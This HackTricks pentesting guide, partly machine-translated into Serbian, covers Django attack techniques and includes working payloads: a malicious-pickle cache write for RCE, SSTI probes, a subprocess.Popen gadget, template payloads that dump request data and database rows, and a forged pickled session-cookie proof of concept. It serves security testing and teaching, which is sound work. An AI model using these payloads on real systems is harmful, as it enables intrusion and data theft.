Django

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!

Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.

Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Cache manipulacija do RCE

Django’s default cache storage method is Python pickles, which can lead to RCE if untrusted input is unpickled. Ako napadač može da dobije pravo pisanja u cache, može da eskalira ovu ranjivost u RCE na osnovnom serveru.

Django cache is stored in one of four places: Redis, memory, files, or a database. Cache stored in a Redis server or database are the most likely attack vectors (Redis injection and SQL injection), but an attacker may also be able to use file-based cache to turn an arbitrary write into RCE. Maintainers have marked this as a non-issue. Važno je napomenuti da će folder za cache fajlove, naziv SQL tabele i detalji Redis servera varirati u zavisnosti od implementacije.

On FileBasedCache, the pickled value is written to a file under CACHES['default']['LOCATION'] (often /var/tmp/django_cache/). If that directory is world-writable or attacker-controlled, dropping a malicious pickle under the expected cache key yields code execution when the app reads it:

python - <<'PY'
import pickle, os
class RCE:
def __reduce__(self):
return (os.system, ("id >/tmp/pwned",))
open('/var/tmp/django_cache/cache:malicious', 'wb').write(pickle.dumps(RCE(), protocol=4))
PY

Ovaj HackerOne izveštaj daje odličan, reprodukovani primer iskorišćavanja Django cache-a koji se čuva u SQLite bazi podataka: https://hackerone.com/reports/1415436

Server-Side Template Injection (SSTI)

The Django Template Language (DTL) je Turing-kompletan. Ako se korisnički prosleđeni podaci renderuju kao template string (na primer pozivom Template(user_input).render() ili kada |safe/format_html() uklanjaju auto-escaping), napadač može postići potpuno SSTI → RCE.

Detekcija

Potražite dinamičke pozive Template() / Engine.from_string() / render_to_string() koji uključuju bilo koje nesanitizovane podatke iz zahteva.
Pošaljite vremenski zasnovan ili aritmetički payload:

{{7*7}}

Ako renderovani izlaz sadrži 49, unos se kompajlira od strane template engine-a. 3. DTL is not Jinja2: arithmetic/loop payloads regularly raise TemplateSyntaxError/500 while still proving evaluation. Polyglots like ${{<%[%'"}}% are good crash-or-render probes.

Context exfiltration when RCE is blocked

Čak i ako object-walking do subprocess.Popen ne uspe, DTL i dalje izlaže objekte koji su u opsegu:

{{ request }}               {# confirm SSTI #}
{{ request.META }}           {# leak Gunicorn/UWSGI headers, cookies, proxy info #}
{{ users }}                  {# QuerySet in the context? #}
{{ users.0 }}                {# first row #}
{{ users.values }}           {# dumps dicts of every column (email/flags/plaintext passwords if stored) #}

QuerySet.values() prisiljava redove na rečnike, zaobilazeći __str__ i otkrivajući sva polja koja vraća queryset. Ovo funkcioniše čak i kada je direktno izvršavanje Python-a filtrirano.

Automation pattern: autentifikuj se, uzmi CSRF token, sačuvaj payload sa marker-prefiksom u bilo kojem perzistentnom polju (npr. username/profile bio), zatim zatraži view koji ga renderuje (AJAX endpoints kao /likes/<id> su česti). Parsiraj stabilan atribut (npr. title="...") da povratiš renderovani rezultat i iteriraš payload-e.

Primitive to RCE

Django blokira direktan pristup __import__, ali Python graf objekata je dostupan:

{{''.__class__.mro()[1].__subclasses__()}}

Pronađite indeks subprocess.Popen (≈400–500 u zavisnosti od Python build-a) i izvršite proizvoljne komande:

{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}

A safer universal gadget is to iterate until cls.__name__ == 'Popen'.

The same gadget works for Debug Toolbar or Django-CMS template rendering features that mishandle user input.

Also see: ReportLab/xhtml2pdf PDF export RCE

Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets [[[ ... ]]] enabling code execution (CVE-2023-33733). Details, payloads, and mitigations:

Reportlab Xhtml2pdf Triple Brackets Expression Evaluation Rce Cve 2023 33733

If the setting SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' is enabled (or a custom serializer that deserialises pickle), Django decrypts and unpickles the session cookie before calling any view code. Therefore, possessing a valid signing key (the project SECRET_KEY by default) is enough for immediate remote code execution.

Exploit Requirements

The server uses PickleSerializer.
The attacker knows / can guess settings.SECRET_KEY (leaks via GitHub, .env, error pages, etc.).

Proof-of-Concept

#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import os, base64

class RCE(object):
def __reduce__(self):
return (os.system, ("id > /tmp/pwned",))

mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer)
print(f"sessionid={mal}")

Pošaljite dobijeni cookie, i payload se izvršava sa privilegijama WSGI worker-a.

Ublažavanja: Zadržite podrazumevani JSONSerializer, rotirajte SECRET_KEY, i konfigurišite SESSION_COOKIE_HTTPONLY.

Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check

CVE-2025-48432 – Log Injection via unescaped request.path (fixed June 4 2025). Dozvoljava napadačima da ubace newlines/ANSI codes u log fajlove i zatrovaju dalju analizu logova. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
CVE-2024-42005 – Critical SQL injection in QuerySet.values()/values_list() on JSONField (CVSS 9.8). Sastavite JSON ključeve tako da prekinu citiranje i izvrše proizvoljan SQL. Fixed in 4.2.15 / 5.0.8.

Uvek odredite tačnu verziju framework-a putem X-Frame-Options error page ili /static/admin/css/base.css hash-a i testirajte gore navedeno gde je primenljivo.

References

Django sigurnosno saopštenje – “Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432” – 4 Jun 2025.
OP-Innovate: “Django releases security updates to address SQL injection flaw CVE-2024-42005” – 11 Aug 2024.
0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – https://0xdf.gitlab.io/2025/08/09/htb-university.html
Django docs – QuerySet.values(): https://docs.djangoproject.com/en/6.0/ref/models/querysets/#values
0xdf: HackNet (HTB) — HTML Attribute Injection → Django SSTI → QuerySet.values data dump → Pickle FileBasedCache RCE – https://0xdf.gitlab.io/2026/01/17/htb-hacknet.html

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!

Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.

Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.